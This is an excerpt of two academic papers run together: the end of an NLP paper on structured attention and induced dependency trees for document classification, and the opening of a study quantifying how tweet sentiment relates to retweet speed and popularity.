68.2 49.4 80.8 74.0 273K 75D No Attention 66.7 47.5 80.5 73.7 330K 100D Simple Attention 67.7 48.2 81.4 75.3 860K 100D Structured Attention (sentence-level) 68.0 48.8 81.5 74.6 842K 100D Structured Attention (document-level) 67.8 48.6 81.1 75.2 842K 100D Structured Attention (both levels) 68.6 49.2 82.1 76.5 860K Table 4: Test accuracy on four datasets and number of parameters θ (excluding embeddings). Regarding feature-based classification methods, results on Yelp and IMDB are taken from Tang et al. (2015a), on CZ movies from Brychcın and Habernal (2013), and Debates from Yogatama and Smith (2014). Wherever available we also provide the size of the recurrent unit (LSTM or GRU). 4.2 Document Classification In this section, we evaluate our document-level model on a variety of classification tasks. We se- lected four datasets which we describe below. Ta- ble 3 summarizes some statistics for each dataset. Yelp reviews were obtained from the 2013 Yelp Dataset Challenge. This dataset contains restaurant reviews, each associated with human ratings on a scale from 1 (negative) to 5 (positive) which we used as gold labels for sentiment classification; we fol- lowed the preprocessing introduced in Tang et al. (2015a) and report experiments on their training, de- velopment, and testing partitions (80/10/10). IMDB reviews were obtained from Diao et al. (2014), who randomly crawled reviews for 50K movies. Each review is associated with user ratings ranging from 1 to 10. Czech reviews were obtained from Brychcın and Habernal (2013). The dataset contains reviews from the Czech Movie Database2 each labeled as positive, neutral, or negative. We include Czech in our exper- iments since it has more flexible word order com- pared to English, with non-projective dependency structures being more frequent. Experiments on this dataset perform 10-fold cross-validation following previous work (Brychcın and Habernal, 2013). 2http://www.csfd.cz/ Congressional floor debates were obtained from a corpus originally created by Thomas et al. (2006) which contains transcripts of U.S. floor debates in the House of Representatives for the year 2005. Each debate consists of a series of speech segments, each labeled by the vote (“yea” or “nay”) cast for the proposed bill by the the speaker of each segment. We used the pre-processed corpus from Yogatama and Smith (2014).3 Following previous work (Yang et al., 2016), we only retained words appearing more than five times in building the vocabulary and replaced words with lesser frequencies with a special UNK to- ken. Word embeddings were initialized by training word2vec (Mikolov et al., 2013) on the training and validation splits of each dataset. In our experiments, we set the word embedding dimension to be 200 and the hidden size for the sentence-level and document- level LSTMs to 100 (the dimensions of the semantic and structure vectors were set to 75 and 25, respec- tively). We used a mini-batch size of 32 during train- ing and documents of similar length were grouped in one batch. Parameters were optimized with Adagrad (Duchi et al., 2011), the learning rate was set to 0.05. We used L2 regularization for all parameters except word embeddings with regularization constant set to 1e−4. Dropout was applied on the input and output 3http://www.cs.cornell.edu/˜ainur/data. html 70 Three men drink at a reflective bar Three men are socializing during happy hour Premise Hypothesis Workers at Basking Robbins are filling orders Workers filling orders at Basking Robbins Figure 5: Dependency trees induced by our model on the SNLI test set. layers with dropout rate 0.3. Our results are summarized in Table 4. We com- pared our model against several related models cov- ering a wide spectrum of representations including word-based ones (e.g., paragraph vector and CNN models) as well as hierarchically composed ones (e.g., a CNN or LSTM provides a sentence vector and then a recurrent neural network combines the sentence vectors to form a document level represen- tation for classification). Previous state-of-the-art results on the three review datasets were achieved by the hierarchical attention network of Yang et al. (2016), which models the document hierarchically with two GRUs and uses an attention mechanism to weigh the importance of each word and sentence. On the debates corpus, Ji and Smith (2017) obtained best results with a recursive neural network model operating on the output of an RST parser. Table 4 presents three variants4 of our model, one with struc- tured attention on the sentence level, another one with structured attention on the document level and a third model which employs attention on both levels. As can be seen, the combination is beneficial achiev- ing best results on three out of four datasets. Further- more, structured attention is superior to the simpler word-to-word attention mechanism, and both types of attention bring improvements over no attention. The structured attention approach is also very effi- cient, taking only 20 minutes for one training epoch on the largest dataset. 4.3 Analysis of Induced Structures To gain further insight on structured attention, we inspected the dependency trees it produces. Specifically, we used the Chu-Liu-Edmonds algo- 4We do not report comparisons with the inside-outside ap- proach on document classification tasks due to its prohibitive computation cost leading to 5 hours of training for one epoch. Parser Attention Projective — 51.4% Height 8.99 5.78 Nodes depth 1 9.8% 8.4% depth 2 15.0% 19.7% depth 3 12.8% 22.4% depth 4 12.5% 23.4% depth 5 12.0% 14.4% depth 6 10.3% 4.5% Same Edges 38.7% Table 5: Descriptive statistics for dependency trees produced by our model and the Stanford parser (Manning et al., 2014) on the SNLI test set. rithm (Chu and Liu, 1965; Edmonds, 1967) to ex- tract the maximum spanning tree from the attention scores. We report various statistics on the character- istics of the induced trees across different tasks and datasets. We also provide examples of tree output, in an attempt to explain how our model uses depen- dency structures to model text. Sentence Trees We compared the dependency trees obtained from our model with those produced by a state-of-the-art dependency parser trained on the English Penn Treebank. Table 5 presents various statistics on the depth of the trees produced by our model on the SNLI test set and the Stanford depen- dency parser (Manning et al., 2014). As can be seen, the induced dependency structures are simpler com- pared to those obtained from the Stanford parser. The trees are generally less deep (their height is 5.78 compared to 8.99 for the Stanford parser), with the majority being of depth 2–4. Almost half of the induced trees have a projective structure, although there is nothing in the model to enforce this con- straint. We also calculated the percentage of head- dependency edges that are identical between the two 71 Yelp IMDB CZ Movies Debates Projective 79.6% 74.9% 82.8% 62.4% Height 2.81 3.34 1.50 3.58 Nodes depth 2 15.1% 13.6% 25.7% 12.8% depth 3 55.6% 46.8% 57.1% 30.2% depth 4 22.3% 32.5% 11.3% 40.8% depth 5 3.2% 4.1% 5.8% 14.8% Table 6: Descriptive statistics for induced document-level dependency trees across datasets. sets of trees. Although our model is not exposed to annotated trees during training, a large number of edges agree with the output of the Stanford parser. Figure 5 shows examples of dependency trees in- duced on the SNLI dataset. Although the model is trained without ever being exposed to a parse tree, it is able to learn plausible dependency structures via the attention mechanism. Overall we observe that the induced trees differ from linguistically mo- tivated ones in the types of dependencies they cre- ate which tend to be of shorter length. The depen- dencies obtained from structured attention are more direct as shown in the first premise sentence in Fig- ure 5 where words at and bar are directly connected to the verb drink. This is perhaps to be expected since the attention mechanism uses the dependency structures to collect information from other words, and the direct links will be more effective. Document Trees We also used the Chu-Liu- Edmonds algorithms to obtain document-level de- pendency trees. Table 6 summarizes various charac- teristics of these trees. For most datasets, document- level trees are not very deep, they mostly contain up to nodes of depth 3. This is not surprising as the documents are relatively short (see Table 3) with the exception of debates which are longer and the induced trees more complex. The fact that most documents exhibit simple discourse structures is fur- ther corroborated by the large number (over 70%) of projective trees induced on Yelp, IMBD, and CZ Movies datasets. Unfortunately, our trees cannot be directly compared with the output of a discourse parser which typically involves a segmentation pro- cess splitting sentences into smaller units. Our trees are constructed over entire sentences, and there is no mechanism currently in the model to split sentences (a) 1 first of all, i did not expect to come into a cafeteria style eatery. 2 they serve the basics of bbq, nothing too fancy. 3 a few appetizers and side options, like cheesy potatoes, baked mac 'n' 4 cheese, fresh corn bread, etc.. 4 all were very tasty. 5 for entree, they have a wide variety of meats and combos and samplers. 6 overall, this is a great place,... meat was well prepared, a little pricey for what i was expecting. 1 2 3 4 5 6 (b) 1 2 3 4 5 1 great instruction by ryan 2 clean workout facility and friendly people 3 they have a new student membership for 60 per month and classes are mon , weds and fri 6pm 7pm 4 it 's definitely worth money if you want to learn brazilian jiu jitsu 5 i usually go to classes on mondays and fridays , and it 's the best workout i 've had in years (c) 1 Ud?lat parodii tak, aby nebyla je?t? trapn?j?í ne? p?vodní film, není zrovna legrace, o tom jsem se p?esv?d?ila u? n?kolikrát (Bul?it, Scary Movie...). To make a parody so that it ends up being even more embarrassing than the original movie is not exactly trivial, this I have been convinced of several times already (Bullshit, Scary Movie...). 2 Jen?e Top Secret? But Top Secret? 3 Nevím, jestli to v?bec m??u ?íct, ale mo?ná tenhle film p?ekonal i skv?lé ?havé výst?ely! I don't know if I can actually say it, but maybe this movie has scored even better than the fantastic Hot Shots! 4 Bo?e, to jsem se nasmála! God, I laughed a lot! 5 Nutno uznat, ?e je to docela síla, kdy? si Ameri?ané d?lali p?ed revolucí takovou srandu z N?mc?. I must admit, that it's pretty cool, when Americans were making so much fun of Germans before the revolution. 6 Ty nará?ky byly vá?n? skv?lé... Jedna z nejlep?ích parodií, co jsem kdy vid?la! The innuendos were really great... One of the best parodies I have ever seen! 3 4 5 61 2 Figure 6: Induced dependency trees for three docu- ments taken from Yelp (a,b) and the Czech Movies dataset (c). English translations are in italics. into discourse units. Figure 6 shows examples of document-level trees taken from Yelp and the Czech Movie dataset. In the first tree, most edges are examples of the “elab- oration” discourse relation, i.e., the child presents 72 additional information about the parent. The sec- ond tree is non-projective, the edges connecting sen- tences 1 and 4 and 3 and 5 cross. The third review, perhaps due to its colloquial nature, is not entirely coherent. However, the model manages to link sen- tences 1 and 3 to sentence 2, i.e., the movie being discussed; it also relates sentence 6 to 4, both of which express highly positive sentiment. 5 Conclusions In this paper we proposed a new model for rep- resenting documents while automatically learning rich structural dependencies. Our model normalizes intra-attention scores with the marginal probabilities of a non-projective dependency tree based on a ma- trix inversion process. Each operation in this pro- cess is differentiable and the model can be trained efficiently end-to-end, while inducing structural in- formation. We applied this approach to model doc- uments hierarchically, incorporating both sentence- and document-level structure. Experiments on sen- tence and document modeling tasks show that the representations learned by our model achieve com- petitive performance against strong comparison sys- tems. Analysis of the induced tree structures re- vealed that they are meaningful, albeit different from linguistics ones, without ever exposing the model to linguistic annotations or an external parser. Directions for future work are many and varied. Given appropriate training objectives (Linzen et al., 2016), it should be possible to induce linguistically meaningful dependency trees using the proposed at- tention mechanism. We also plan to explore how document-level trees can be usefully employed in summarization, e.g., as a means to represent or even extract important content. Acknowledgments The authors gratefully ac- knowledge the support of the European Research Council (award number 681760). We also thank the anonymous TACL reviewers and the action editor whose feedback helped improve the present paper, members of EdinburghNLP for helpful discussions and suggestions, and Barbora Skarabela for translat- ing the Czech document for us. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In Proceed- ings of the ICLR Conference. James K. Baker. 1979. Trainable grammars for speech recognition. The Journal of the Acousti- cal Society of America 65(S1):S132–S132. Regina Barzilay and Mirella Lapata. 2008. Mod- eling local coherence: An entity-based approach. Computational Linguistics 34(1):1–34. Parminder Bhatia, Yangfeng Ji, and Jacob Eisen- stein. 2015. Better document-level sentiment analysis from RST discourse parsing. In Pro- ceedings of the EMNLP Conference. pages 2212– 2218. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large annotated corpus for learning natural language in- ference. In Proceedings of the EMNLP Confer- ence. pages 632–642. Samuel R. Bowman, Jon Gauthier, Abhinav Ras- togi, Raghav Gupta, Christopher D. Manning, and Christopher Potts. 2016. A fast unified model for parsing and sentence understanding. In Proceed- ings of the ACL Conference. pages 1466–1477. Tomáš Brychcın and Ivan Habernal. 2013. Unsu- pervised improving of sentiment analysis using global target context. In Proceedings of the Inter- national Conference on Recent Advances in Nat- ural Language Processing. pages 122–128. Lynn Carlson, Daniel Marcu, and Mary Ellen Okurowski. 2001. Building a discourse-tagged corpus in the framework of rhetorical structure theory. In Proceedings of the Second SIGdial Workshop on Discourse and Dialogue. Qian Chen, Xiaodan Zhu, Zhen-Hua Ling, Si Wei, Hui Jiang, and Diana Inkpen. 2017. Enhanced LSTM for natural language inference. In Pro- ceedings of the ACL Conference. pages 1657– 1668. Qian Chen, Xiaodan Zhu, Zhenhua Ling, Si Wei, and Hui Jiang. 2016. Distraction-based neural networks for modeling documents. In Proceed- ings of the IJCAI Conference. pages 2754–2760. 73 Jianpeng Cheng, Li Dong, and Mirella Lapata. 2016. Long short-term memory-networks for machine reading. In Proceedings of the EMNLP Confer- ence. pages 551–561. Yoeng-Jin Chu and Tseng-Hong Liu. 1965. On shortest arborescence of a directed graph. Scien- tia Sinica 14(10):1396. Michał Daniluk, Tim Rocktäschel, Johannes Welbl, and Sebastian Riedel. 2017. Frustratingly short attention spans in neural language modeling. Pro- ceedings of the ICLR Conference . Qiming Diao, Minghui Qiu, Chao-Yuan Wu, Alexander J Smola, Jing Jiang, and Chong Wang. 2014. Jointly modeling aspects, ratings and senti- ments for movie recommendation (JMARS). In Proceedings of the ACM SIGKDD Conference. pages 193–202. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research 12(Jul):2121–2159. Jack Edmonds. 1967. Optimum branchings. Journal of Research of the national Bureau of Standards B 71(4):233–240. Vanessa Wei Feng and Graeme Hirst. 2012. Text- level discourse parsing with rich linguistic fea- tures. In Proceedings of the ACL Conference. pages 60–68. Alex Graves, Abdel-Rahman Mohamed, and Geof- frey Hinton. 2013. Speech recognition with deep recurrent neural networks. In Proceedings of the IEEE ICASSP Conference. pages 6645–6649. Katsuhiko Hayashi, Tsutomu Hirao, and Masaaki Nagata. 2016. Empirical comparison of depen- dency conversions for RST discourse trees. In Pro-ceedings of the Annual Meeting of SIGDIAL. page 128. Tsutomu Hirao, Yasuhisa Yoshida, Masaaki Nishino, Norihito Yasuda, and Masaaki Nagata. 2013. Single-document summarization as a tree knapsack problem. In Proceedings of the EMNLP Conference. pages 1515–1520. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation 9(8):1735–1780. Yangfeng Ji and Noah Smith. 2017. Neural dis- course structure for text categorization. In Pro- ceedings of the ACL Conference. Yoon Kim, Carl Denton, Luong Hoang, and Alexan- der M. Rush. 2017. Structured attention networks. In Proceedings of the ICLR Conference. Terry Koo, Amir Globerson, Xavier Carreras Pérez, and Michael Collins. 2007. Structured prediction models via the matrix-tree theorem. In Proceed- ings of the EMNLP Conference. pages 141–150. Alan Lee, Rashmi Prasad, Aravind Joshi, Nikhil Di- nesh, and Bonnie Webber. 2006. Complexity of dependencies in discourse: Are dependencies in discourse more complex than in syntax. In Pro- ceedings of the International Workshop on Tree- banks and Linguistic Theories. page 12. Sujian Li, Liang Wang, Ziqiang Cao, and Wenjie Li. 2014. Text-level discourse dependency parsing. In Proceedings of the ACL Conference. pages 25– 35. Ziheng Lin, Hwee Tou Ng, and Min-Yen Kan. 2011. Automatically evaluating text coherence using discourse relations. In Proceedings of the ACL Conference. pages 997–1006. Tal Linzen, Emmanuel Dupoux, and Yoav Gold- berg. 2016. Assessing the ability of LSTMs to learn syntax-sensitive dependencies. Transac- tions of the Association for Computational Lin- guistics 4:521–535. Yang Liu and Mirella Lapata. 2017. Learning con- textually informed representations for linear-time discourse parsing. In Proceedings of the EMNLP Conference. pages 1300–1309. William C. Mann and Sandra A. Thompson. 1988. Rhetorical structure theory: Toward a functional theory of text organization. Text-Interdisciplinary Journal for the Study of Discourse 8(3):243–281. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Rose Finkel, Steven Bethard, and David McClosky. 2014. The Stanford CoreNLP Natural Language Processing Toolkit. In Pro- ceedings of the ACL Conference (System Demon- strations). pages 55–60. Ryan McDonald and Giorgio Satta. 2007. On the complexity of non-projective data-driven depen- 74 dency parsing. In Proceedings of the 10th Interna- tional Conference on Parsing Technologies. pages 121–132. Igor A. Melc̆uk. 1988. Dependency Syntax: Theory and Practice. State University of New York Press. Mohsen Mesgar and Michael Strube. 2015. Graph- based coherence modeling for assessing readabil- ity. In Proceedings of the 4th Joint Conference on Lexical and Computational Semantics. pages 309–318. Thomas Meyer and Bonnie Webber. 2013. Im- plicitation of discourse connectives in (machine) translation. In Proceedings of the Workshop on Discourse in Machine Translation. pages 19–26. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Corrado, and Jeff Dean. 2013. Distributed rep- resentations of words and phrases and their com- positionality. In Proceedings of the NIPS Confer- ence. pages 3111–3119. Alexander Miller, Adam Fisch, Jesse Dodge, Amir- Hossein Karimi, Antoine Bordes, and Jason We- ston. 2016. Key-value memory networks for di- rectly reading documents. In Proceedings of the EMNLP Conference. pages 1400–1409. Ankur Parikh, Oscar Täckström, Dipanjan Das, and Jakob Uszkoreit. 2016. A decomposable atten- tion model for natural language inference. In Pro- ceedings of the EMNLP Conference. pages 2249– 2255. Jeffrey Pennington, Richard Socher, and Christo- pher D. Manning. 2014. Glove: Global vectors for word representation. In Proceedings of the EMNLP Conference. pages 1532–1543. Rashmi Prasad, Nikhil Dinesh, Alan Lee, Eleni Miltsakaki, Livio Robaldo, Aravind K. Joshi, and Bonnie L. Webber. 2008. The Penn discourse TreeBank 2.0. In LREC. Tim Rocktäschel, Edward Grefenstette, Karl Moritz Hermann, Tomáš Kočiskỳ, and Phil Blunsom. 2016. Reasoning about entailment with neural at- tention. In Proceedings of the ICLR Conference. Duyu Tang, Bing Qin, and Ting Liu. 2015a. Doc- ument modeling with gated recurrent neural net- work for sentiment classification. In Proceedings of the EMNLP Conference. pages 1422–1432. Duyu Tang, Bing Qin, and Ting Liu. 2015b. Learn- ing semantic representations of users and prod- ucts for document level sentiment classification. In Proceedings of the ACL Conference. pages 1014–1023. Louis Tesniére. 1959. Éléments de Syntaxe Struc- turale. Editions Klincksieck. Matt Thomas, Bo Pang, and Lillian Lee. 2006. Get out the vote: Determining support or opposition from congressional floor-debate transcripts. In Proceedings of the EMNLP Conference. pages 327–335. William Thomas Tutte. 1984. Graph theory. Suzan Verberne, Lou Boves, Nelleke Oostdijk, and Peter-Arno Coppen. 2007. Discourse-based answering of why-questions. Traitement Au- tomatique des Language, Discours et Document: Traitements Automatics 47(2):21–41. Shuohang Wang and Jing Jiang. 2016. Learning nat- ural language inference with LSTM. In Proceed- ings of NAACL Conference. pages 1442–1451. Florian Wolf and Edward Gibson. 2006. Coherence in Natural Language: Data Structures and Appli- cations. The MIT Press. Pengtao Xie and Eric P. Xing. 2013. Integrating doc- ument clustering and topic modeling. In Proceed- ings of the Conference on Uncertainty in Artificial Intelligence. pages 694–703. Kelvin Xu, Jimmy Ba, Ryan Kiros, Kyunghyun Cho, Aaron Courville, Ruslan Salakhudinov, Rich Zemel, and Yoshua Bengio. 2015. Show, attend and tell: Neural image caption generation with visual attention. In International Conference on Machine Learning. pages 2048–2057. Zichao Yang, Diyi Yang, Chris Dyer, Xiaodong He, Alex Smola, and Eduard Hovy. 2016. Hierar- chical attention networks for document classifica- tion. In Proceedings of the NAACL Conference. pages 1480–1489. Dani Yogatama and Noah A. Smith. 2014. Linguis- tic structured sparsity in text categorization. In Proceedings of the ACL Conference. pages 786– 796. 75 76 work_fo2sjxybtvhovo3ljrsijpt4pi ---- Quantifying the effect of sentiment on information diffusion in social media Submitted 19 June 2015 Accepted 15 September 2015 Published 30 September 2015 Corresponding author Emilio Ferrara, ferrarae@isi.edu, emilio.ferrara@gmail.com Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.26 Copyright 2015 Ferrara and Yang Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Quantifying the effect of sentiment on information diffusion in social media Emilio Ferrara1 ,2 and Zeyao Yang1 1 Information Sciences Institute, University of Southern California, Marina Del Rey, CA, United States 2 School of Informatics and Computing, Indiana University, Bloomington, IN, United States ABSTRACT Social media has become the main vehicle of information production and consumption online. Millions of users every day log on their Facebook or Twitter accounts to get updates and news, read about their topics of interest, and become exposed to new opportunities and interactions. Although recent studies suggest that the contents users produce will affect the emotions of their readers, we still lack a rigorous understanding of the role and effects of contents sentiment on the dynamics of information diffusion. This work aims at quantifying the effect of sentiment on information diffusion, to understand: (i) whether positive conversations spread faster and/or broader than negative ones (or vice-versa); (ii) what kind of emotions are more typical of popular conversations on social media; and, (iii) what type of sentiment is expressed in conversations characterized by different temporal dynamics. Our findings show that, at the level of contents, negative messages spread faster than positive ones, but positive ones reach larger audiences, suggesting that people are more inclined to share and favorite positive contents, the so-called positive bias. As for the entire conversations, we highlight how different temporal dynamics exhibit different sentiment patterns: for example, positive sentiment builds up for highly-anticipated events, while unexpected events are mainly characterized by negative sentiment. Our contribution represents a step forward to understand how the emotions expressed in short texts correlate with their spreading in online social ecosystems, and may help to craft effective policies and strategies for content generation and diffusion. Subjects Data Mining and Machine Learning, Data Science, Network Science and Online Social Networks Keywords Computational social science, Social networks, Social media, Sentiment analysis, Information diffusion INTRODUCTION The emerging field of computational social science has been focusing on studying the characteristics of techno-social systems (Lazer et al., 2009; Vespignani, 2009; Kaplan & Haenlein, 2010; Asur & Huberman, 2010; Cheng et al., 2014) to understand the effects of technologically-mediated communication on our society (Gilbert & Karahalios, 2009; Ferrara, 2012; Tang, Lou & Kleinberg, 2012; De Meo et al., 2014; Backstrom & Kleinberg, 2014). Research on information diffusion focused on the complex dynamics that characterize social media discussions (Java et al., 2007; Huberman, Romero & Wu, 2009; Bakshy et al., 2012; Ferrara et al., 2013a) to understand their role as central fora How to cite this article Ferrara and Yang (2015), Quantifying the effect of sentiment on information diffusion in social media. PeerJ Comput. Sci. 1:e26; DOI 10.7717/peerj-cs.26 mailto:ferrarae@isi.edu mailto:emilio.ferrara@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.26 http://dx.doi.org/10.7717/peerj-cs.26 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 to debate social issues (Conover et al., 2013b; Conover et al., 2013a; Varol et al., 2014), to leverage their ability to enhance situational, social, and political awareness (Sakaki, Okazaki & Matsuo, 2010; Centola, 2010; Centola, 2011; Bond et al., 2012; Ratkiewicz et al., 2011; Metaxas & Mustafaraj, 2012; Ferrara et al., 2014), or to study susceptibility to influence and social contagion (Aral, Muchnik & Sundararajan, 2009; Aral & Walker, 2012; Myers, Zhu & Leskovec, 2012; Anderson et al., 2012; Lerman & Ghosh, 2010; Ugander et al., 2012; Weng & Menczer, 2013; Weng, Menczer & Ahn, 2014). The amount of information that generated and shared through online platforms like Facebook and Twitter yields unprecedented opportunities to millions of individuals every day (Kwak et al., 2010; Gomez Rodriguez, Leskovec & Schölkopf, 2013; Ferrara et al., 2013b). Yet, how understanding of the role of the sentiment and emotions conveyed through the content produced and consumed on these platforms is shallow. In this work we are concerned in particular with quantifying the effect of sentiment on information diffusion in social networks. Although recent studies suggest that emotions are passed via online interactions (Harris & Paradice, 2007; Mei et al., 2007; Golder & Macy, 2011; Choudhury, Counts & Gamon, 2012; Kramer, Guillory & Hancock, 2014; Ferrara & Yang, 2015; Beasley & Mason, 2015), and that many characteristics of the content may affect information diffusion (e.g., language-related features (Nagarajan, Purohit & Sheth, 2010), hashtag inclusion (Suh et al., 2010), network structure (Recuero, Araujo & Zago, 2011), user metadata (Ferrara et al., 2014)), little work has been devoted to quantifying the extent to which sentiment drives information diffusion in online social media. Some studies sug- gested that content conveying positive emotions could acquire more attention (Kissler et al., 2007; Bayer, Sommer & Schacht, 2012; Stieglitz & Dang-Xuan, 2013) and trigger higher levels of arousal (Berger, 2011), which can further affect feedback and reciprocity (Dang- Xuan & Stieglitz, 2012) and social sharing behavior (Berger & Milkman, 2012). In this study, we take Twitter as scenario, and we explore the complex dynamics intertwining sentiment and information diffusion. We start by focusing on content spreading, exploring what effects sentiment has on the diffusion speed and on content popularity. We then shift our attention to entire conversations, categorizing them into different classes depending on their temporal evolution: we highlight how different types of discussion dynamics exhibit different types of sentiment evolution. Our study timely furthers our understanding of the intricate dynamics intertwining information diffusion and emotions on social media. MATERIALS AND METHODS Sentiment analysis Sentiment analysis was proven an effective tool to analyze social media streams, especially for predictive purposes (Pang & Lee, 2008; Bollen, Mao & Zeng, 2011; Bollen, Mao & Pepe, 2011; Le, Ferrara & Flammini, 2015). A number of sentiment analysis methods have been proposed to date to capture content sentiment, and some have been specifically designed for short, informal texts (Akkaya, Wiebe & Mihalcea, 2009; Paltoglou & Thelwall, 2010; Hutto & Gilbert, 2014). To attach a sentiment score to the tweets in our dataset, we here Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 2/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 adopt a SentiStrength, a promising sentiment analysis algorithm that, if compared to other tools, provides several advantages: first, it is optimized to annotate short, informal texts, like tweets, that contain abbreviations, slang, and the like. SentiStrength also employs additional linguistic rules for negations, amplifications, booster words, emoticons, spelling corrections, etc. Research applications of SentiStrength to MySpace data found it particularly effective at capturing positive and negative emotions with, respectively, 60.6% and 72.8% accuracy (Thelwall et al., 2010; Thelwall, Buckley & Paltoglou, 2011; Stieglitz & Dang-Xuan, 2013). The algorithm assigns to each tweet t a positive S+(t) and negative S−(t) sentiment score, both ranging between 1 (neutral) and 5 (strongly positive/negative). Starting from the sentiment scores, we capture the polarity of each tweet t with one single measure, the polarity score S(t), defined as the difference between positive and negative sentiment scores: S(t) = S+(t) − S−(t). (1) The above-defined score ranges between −4 and +4. The former score indicates an extremely negative tweet, and occurs when S+(t) = 1 and S−(t) = 5. Vice-versa, the latter identifies an extremely positive tweet labeled with S+(t) = 5 and S−(t) = 1. In the case S+(t) = S−(t)—positive and negative sentiment scores for a tweet t are the same— the polarity S(t) = 0 of tweet t is considered as neutral. We decided to focus on the polarity score (rather than the two dimensions of sentiment separately) because previous studies highlighted the fact that measuring the overall sentiment is easier and more accurate than trying to capture the intensity of sentiment—this is especially true for short texts like tweets, due to the paucity of information conveyed in up to 140 characters (Thelwall et al., 2010; Thelwall, Buckley & Paltoglou, 2011; Stieglitz & Dang-Xuan, 2013; Ferrara & Yang, 2015). Data The dataset adopted in this study contains a sample of all public tweets produced during September 2014. From the Twitter gardenhose (a roughly 10% sample of the social stream that we process and store at Indiana University) we extracted all tweets in English that do not contain URLs or media content (photos, videos, etc.) produced in that month. This choice is dictated by the fact that we can hardly computationally capture the sentiment or emotions conveyed by multimedia content, and processing content from external resources (such as webpages, etc.) would be computationally hard. This dataset comprises of 19,766,112 tweets (more than six times larger than the Facebook experiment (Kramer, Guillory & Hancock, 2014)) produced by 8,130,481 distinct users. All tweets are processed by SentiStrength and attached with sentiment scores (positive and negative) and with the polarity score calculated as described before. We identify three classes of tweets’ sentiment: negative (polarity score S ≤ −1), neutral (S = 0), and positive (S ≥ 1). Negative, neutral, and positive tweets account for, respectively, 21.59%, 42.46% and 35.95% of the total. The distribution of polarity scores is captured by Fig. 1: we can see it is peaked around neutral tweets, accounting for over two-fifths of the total, while overall the distribution is Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 3/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 Figure 1 Distribution of polarity scores computed for our dataset. The polarity score S is the dif- ference between positive and negative sentiment scores as calculated by SentiStrength. The dataset (N = 19,766,112 tweets, by M = 8,130,481 different users) contains 42.46% of neutral (S = 0), 35.95% of positive (S ≥ 1), and 21.59% of negative (S ≤ −1) tweets, respectively. slightly skewed toward positiveness. We can also observe that extreme values of positive and negative tweets are comparably represented: for example, there are slightly above 446 thousand tweets with polarity score S = +3, and about 592 thousands with opposite polarity of S = −3. RESULTS The role of sentiment on information diffusion Here we are concerned with studying the relation between content sentiment and information diffusion. Figure 2 shows the effect of content sentiment on the information diffusion dynamics and on content popularity. We measure three aspects of information diffusion, as function of tweets polarity scores: Fig. 2A shows the average number of retweets collected by the original posts as function of the polarity expressed therein; similarly, Fig. 2B shows the average number of times the original tweet has been favorited; Fig. 2C illustrates the speed of information diffusion, as reflected by the average number of seconds that occur between the original tweet and the first retweet. Both Figs. 2A and 2C focus only on tweets that have been retweeted at least once. Figure 2B considers only tweets that have been favorited at least once. Note that a large fraction of tweets are never retweeted (79.01% in our dataset) or favorited (87.68%): Fig. 2A is based on the 4,147,519 tweets that have been retweeted at least once (RT ≥ 1), Fig. 2B reports on the 2,434,523 tweets that have favorited at least once, and Fig. 2C is comprised of the 1,619,195 tweets for which we have observed the first retweet in our dataset (so that we can compute the time between the original tweet and the first retweet). Note that the retweet count is extracted from the tweet metadata, instead of being calculated as the number of times we observe a retweet of each tweet in our dataset, in order to avoid the bias due to the sampling rate of the Twitter gardenhose. For this reason, the average number of retweets reported in Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 4/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 Figure 2 The effect of sentiment on information diffusion. (A) the average number of retweets, (B) the average number of favorites, and (C) the average number of seconds passed before the first retweet, as a function of the polarity score of the given tweet. The number on the points represent the amount of tweets with such polarity score in our sample. Bars represent standard errors. Fig. 2A seems pretty high (above 100 for all classes of polarity scores): by capturing the “true” number of retweets we well reflect the known broad distributions of content popularity of social media, skewing the values of the means toward larger figures. The very same reasoning applies for the number of favorites. Due to the high skewness of the distributions of number of retweets, number of favorites, and time before first retweet, we performed the same analysis as above on median values rather than averages. The same trends hold true: particularly interesting, average and median seconds before the first retweet are substantially identical. The results for the average and median number of retweets and favorites are also comparable, factoring out some small fluctuations. Two important considerations emerge from the analysis of Fig. 2: (i) positive tweets spread broader than neutral ones, and collect more favorites, but interestingly negative posts do not spread any more or less than neutral ones, neither get more or less favorited. This suggests the hypothesis of observing the presence of positivity bias (Garcia, Garas & Schweitzer, 2012) (or Pollyanna hypothesis (Boucher & Osgood, 1969)), that is the tendency of individuals to favor positive rather than neutral or negative items, and choose what information to favor or rebroadcast further accordingly to this bias. (ii) Negative content spread much faster than positive ones, albeit not significantly faster than neutral ones. This suggests that positive tweets require more time to be rebroadcasted, while negative or neutral posts generally achieve their first retweet twice as fast. Interestingly, previous studies on information cascades showed that all retweets after the first take increasingly less time, which means that popular content benefit from a feedback loop that speeds up the diffusion more and more as a consequence of the increasing popularity (Kwak et al., 2010). Conversations’ dynamics and sentiment evolution To investigate how sentiment correlates with content popularity, we now only consider active and exclusive discussions occurred on Twitter in September 2014. Each topic of discussion is here identified by its most common hashtag. Active discussions are defined as those with more than 200 tweets (in our dataset, which is roughly a 10% sample of the Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 5/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 Figure 3 Dynamical classes of popularity capturing four different types of Twitter conversa- tions. (A) shows the Gaussian Mixture Model employed to discover the four classes. The y and x 